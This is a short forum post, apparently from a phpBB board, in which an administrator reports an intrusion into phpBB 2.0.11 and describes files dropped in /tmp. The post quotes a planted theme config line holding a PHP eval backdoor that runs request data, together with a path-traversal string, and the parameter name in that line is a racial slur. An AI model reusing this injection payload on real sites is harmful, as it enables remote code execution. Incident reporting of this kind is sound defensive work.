[Number 2]
It seems that with
phpBB 2.0.11 some exploit with "auto-generated schemes" is possible, leaving suspect files in our /tmp directory:
Code:
-rw-r--r-- 1 wwwrun nogroup 19628 Oct 22 02:45 a.pl
-rw-rw-rw- 1 wwwrun nogroup 6268 Oct 22 02:45 theme_info.cfg
"theme_info.cfg" is giving a hint where and how the attacker came in:
Code:
// phpBB 2.x auto-generated theme config file for aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../..
/../tmp
"a.pl" seems to be a typical hacker's-IRC which tries to bind to port 6667 and waits for commands there.
Luckily, it seems that the IRC server is unable to function if there's already something binding to 6667.
That was the case with our setup, leading to strange IRC logs when the second part of this (probably worm-)attack tried to reach it's little helper on our machine...
Login
Register
FAQ
Search
